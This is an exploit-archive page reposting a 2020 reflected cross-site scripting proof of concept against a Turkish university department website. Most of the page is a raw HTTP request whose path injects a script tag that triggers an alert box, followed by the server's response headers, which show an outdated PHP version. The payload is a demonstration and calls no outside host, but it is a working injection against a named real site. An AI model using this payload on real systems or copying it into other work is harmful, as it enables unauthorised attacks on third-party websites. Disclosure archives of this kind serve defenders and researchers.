Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

Dokuz Eyll niversitesi Bilgisayar Blm reflected xss
# Exploit Title: Dokuz Eyll niversitesi Bilgisayar Blm reflected xss
# Date: 21.01.2020
# Exploit Author: Furkan zer
# Vendor Homepage:


# PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Mon, 21 Jan 2020 19:03:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 7363
Keep-Alive: timeout=5, max=36
Connection: Keep-Alive
Content-Type: text/html

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.